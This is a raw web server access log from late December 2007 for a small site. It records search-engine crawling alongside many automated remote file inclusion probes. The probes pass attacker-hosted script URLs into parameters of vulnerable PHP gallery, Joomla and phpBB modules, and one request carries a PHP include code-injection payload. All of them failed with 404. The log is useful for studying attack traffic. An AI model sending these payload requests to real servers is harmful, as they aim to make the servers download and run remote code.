200.37.173.162 - - [29/Dec/2007:16:35:36 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [29/Dec/2007:16:35:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [29/Dec/2007:16:35:37 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:37:56 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:37:56 -0800] "HEAD /bikes/dteel/MVI_2430.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.70.241 - - [29/Dec/2007:16:37:56 -0800] "HEAD /bikes/dteel/MVI_2434.AVI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:20 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:20 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:20 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:21 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:21 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:39:21 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:50 -0800] "GET /logs/access_071215.log/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:50 -0800] "GET /index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:50 -0800] "GET /logs/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:59 -0800] "GET /logs/access_071215.log/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:59 -0800] "GET /index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:39:59 -0800] "GET /logs/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:40:13 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:40:13 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [29/Dec/2007:16:40:13 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:40:17 -0800] "GET /logs/access_071215.log/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:40:17 -0800] "GET /index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.82.80 - - [29/Dec/2007:16:40:17 -0800] "GET /logs/index.php?id=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:16:42:58 -0800] "GET /logs/access_071127.log HTTP/1.0" 200 203829 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:16:43:03 -0800] "GET /logs/access_070811.log HTTP/1.0" 200 94297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:43:33 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:43:33 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:43:33 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:45:00 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:45:00 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:45:01 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:46:21 -0800] "GET /logs/access_071215.log/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:46:21 -0800] "GET /index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [29/Dec/2007:16:46:21 -0800] "GET /logs/index.php?id=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.146.176 - - [29/Dec/2007:16:47:33 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.36.115.42 - - [29/Dec/2007:16:54:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.42 - - [29/Dec/2007:16:54:00 -0800] "GET /logs/access_070817.log HTTP/1.0" 200 59720 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:16:55:43 -0800] "GET /logs/access_071212.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:16:55:43 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:16:55:44 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:16:57:58 -0800] "GET //bottom.php?style=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:16:57:58 -0800] "GET /logs//bottom.php?style=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:16:58:16 -0800] "GET //Module/Galerie.php?Ent=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:16:58:16 -0800] "GET /logs//Module/Galerie.php?Ent=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:16:58:49 -0800] "GET /about.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:16:59:01 -0800] "GET /logs//admin/classes/pear/OLE/PPS/File.php?homedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:16:59:04 -0800] "GET //admin/classes/pear/OLE/PPS/File.php?homedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:17:00:59 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:17:00:59 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:17:03:58 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:17:03:59 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.130.178 - - [29/Dec/2007:17:03:59 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.135 - - [29/Dec/2007:17:08:46 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:17:09:39 -0800] "GET /logs//Module/Galerie.php?Ent=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
193.142.215.14 - - [29/Dec/2007:17:09:39 -0800] "GET //Module/Galerie.php?Ent=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:17:11:33 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [29/Dec/2007:17:11:37 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.6.26.118 - - [29/Dec/2007:17:12:44 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:17:13:24 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:17:13:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [29/Dec/2007:17:13:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.203 - - [29/Dec/2007:17:17:11 -0800] "GET /megumi/Bracelet/?D=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:17:18:03 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
125.7.48.1 - - [29/Dec/2007:17:18:03 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:17:18:14 -0800] "GET //s02.php?shopid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.205.123.49 - - [29/Dec/2007:17:18:15 -0800] "GET /logs//s02.php?shopid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:17:18:45 -0800] "GET //s02.php?shopid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.186.18.99 - - [29/Dec/2007:17:18:45 -0800] "GET /logs//s02.php?shopid=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
66.232.156.125 - - [29/Dec/2007:17:31:19 -0800] "GET /logs/access_071215.log/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.125 - - [29/Dec/2007:17:31:19 -0800] "GET /index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.125 - - [29/Dec/2007:17:31:19 -0800] "GET /logs/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.27.78 - - [29/Dec/2007:17:32:45 -0800] "GET /logs/access_071215.log/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.27.78 - - [29/Dec/2007:17:32:45 -0800] "GET /index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.27.78 - - [29/Dec/2007:17:32:46 -0800] "GET /logs/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.156.125 - - [29/Dec/2007:17:37:11 -0800] "GET /logs/access_071214.log/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.22.250 - - [29/Dec/2007:17:38:24 -0800] "GET /index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://siregars.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.38.22.250 - - [29/Dec/2007:17:38:24 -0800] "GET /logs/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=http://siregars.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.6.22.221 - - [29/Dec/2007:17:38:49 -0800] "GET /logs/access_070906.log HTTP/1.0" 200 32974 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.175.205.226 - - [29/Dec/2007:17:39:28 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [29/Dec/2007:17:39:29 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.205.226 - - [29/Dec/2007:17:39:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.27.78 - - [29/Dec/2007:17:39:30 -0800] "GET /logs/access_071214.log/index.php?pageurl=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.175.205.226 - - [29/Dec/2007:17:46:48 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.158 - - [29/Dec/2007:17:56:36 -0800] "GET /tmp/?M=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
152.46.7.81 - - [29/Dec/2007:17:57:00 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.46.7.81 - - [29/Dec/2007:17:57:00 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
152.46.7.81 - - [29/Dec/2007:17:57:00 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.223 - - [29/Dec/2007:17:59:02 -0800] "GET /tmp/sess_e43188fd03ba16b3c1b406676c7153d7 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.45.231.226 - - [29/Dec/2007:18:10:32 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.231.226 - - [29/Dec/2007:18:10:32 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.231.226 - - [29/Dec/2007:18:10:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/testador.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.228 - - [29/Dec/2007:18:20:33 -0800] "GET /logs/access_070928.log HTTP/1.0" 200 16581 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:18:23:47 -0800] "GET /minamijewelry/moon.psd HTTP/1.0" 200 108656 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.28 - - [29/Dec/2007:18:26:16 -0800] "GET /minamijewelry/source_images/?N=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:18:31:39 -0800] "GET /modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:18:31:39 -0800] "GET /logs/modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.233 - - [29/Dec/2007:18:32:32 -0800] "GET /modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:18:32:32 -0800] "GET /modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.233 - - [29/Dec/2007:18:32:32 -0800] "GET /logs/modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:18:32:32 -0800] "GET /logs/modifyform.html?code=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:36:02 -0800] "GET /scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.27.78 - - [29/Dec/2007:18:36:08 -0800] "GET /bikes/dteel/140CANON/?D=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:36:46 -0800] "GET /logs/access_071212.log/scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:36:46 -0800] "GET /scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:36:46 -0800] "GET /logs/scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:37:55 -0800] "GET /logs/access_071215.log/scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:40:36 -0800] "GET /logs/access_071129.log/scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.10.114 - - [29/Dec/2007:18:41:57 -0800] "GET /logs/access_071222.log/scanhttp://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:18:42:53 -0800] "GET /logs/access_070801.log HTTP/1.0" 200 22773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [29/Dec/2007:19:12:52 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:19:13:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:19:13:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:19:13:24 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
4.79.181.248 - - [29/Dec/2007:19:13:24 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.powersportsdata.com/calendar/includes/php/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
